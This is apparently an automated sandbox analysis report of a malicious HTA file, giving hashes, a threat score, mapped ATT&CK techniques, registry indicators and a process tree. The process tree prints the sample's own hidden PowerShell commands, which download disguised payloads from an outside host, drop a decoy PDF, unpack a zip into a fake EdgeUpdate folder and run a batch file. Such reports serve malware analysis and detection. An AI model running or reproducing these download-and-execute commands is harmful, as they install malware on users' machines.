f6f4ab1036beaf92827bdfb23c1332990797515d8a5832c9671962376a24d74b

General

Target

start.hta
Size

2KB
MD5

72f081c2a85a3b7ff6fdf4ec84223142
SHA1

62b7fc52e1da16e69314f873e20db6f21135be8c
SHA256

f6f4ab1036beaf92827bdfb23c1332990797515d8a5832c9671962376a24d74b
SHA512

6ccb132bea970b4cdae18b42320770557025d05a05b2e5398392ab8de47595f07b50d42f1f2f03b1da258b7fe872d3432eef7aa04f90025596cda22acfa5308b

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2968	powershell.exe
2964	powershell.exe
2968	powershell.exe
2964	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2968	powershell.exe
2964	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2964	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2592 wrote to memory of 2488	2592	mshta.exe	30
PID 2592 wrote to memory of 2488	2592	mshta.exe	30
PID 2592 wrote to memory of 2488	2592	mshta.exe	30
PID 2592 wrote to memory of 2488	2592	mshta.exe	30
PID 2592 wrote to memory of 2888	2592	mshta.exe	31
PID 2592 wrote to memory of 2888	2592	mshta.exe	31
PID 2592 wrote to memory of 2888	2592	mshta.exe	31
PID 2592 wrote to memory of 2888	2592	mshta.exe	31
PID 2888 wrote to memory of 2964	2888	cmd.exe	34
PID 2888 wrote to memory of 2964	2888	cmd.exe	34
PID 2888 wrote to memory of 2964	2888	cmd.exe	34
PID 2888 wrote to memory of 2964	2888	cmd.exe	34
PID 2488 wrote to memory of 2968	2488	cmd.exe	35
PID 2488 wrote to memory of 2968	2488	cmd.exe	35
PID 2488 wrote to memory of 2968	2488	cmd.exe	35
PID 2488 wrote to memory of 2968	2488	cmd.exe	35

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\start.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2592
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest https://live.ns-online.com/BgHrn/Back.png -OutFile C:\Users\Admin\Downloads\20241288346.pdf" && start C:\Users\Admin\Downloads\20241288346.pdf
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest https://live.ns-online.com/BgHrn/Back.png -OutFile C:\Users\Admin\Downloads\20241288346.pdf"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2968
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest https://live.ns-online.com/BgHrn/Front.png -OutFile C:\Users\Admin\Main.zip; Expand-Archive -LiteralPath C:\Users\Admin\Main.zip -Destinationpath C:\Users\Admin\AppData\Local\Microsoft\EdgeUpdate\Update" && start /b C:\Users\Admin\AppData\Local\Microsoft\EdgeUpdate\Update\Main.bat
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest https://live.ns-online.com/BgHrn/Front.png -OutFile C:\Users\Admin\Main.zip; Expand-Archive -LiteralPath C:\Users\Admin\Main.zip -Destinationpath C:\Users\Admin\AppData\Local\Microsoft\EdgeUpdate\Update"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MWRP9RF36N8VBO1AAKZD.temp

Filesize
7KB

MD5
f632f938e8819408d55e5f6e0e723777

SHA1
0e65f9072fe6f9704a9f69347aedf80638fa465e

SHA256
5513c5bbe9eb50cd89bebb949769884890b423e3b0d7ee64d27b34ce6b12b2d4

SHA512
c7f464b51d39cd7117bc69d925166ff6e8067fbde60b1e0cb17f2040fa97a05deb12647a06301e7b0546e84a65f7d1651f4bd14ab8e442c4649f2a890c962e44

Download Submit

Analysis

Sharing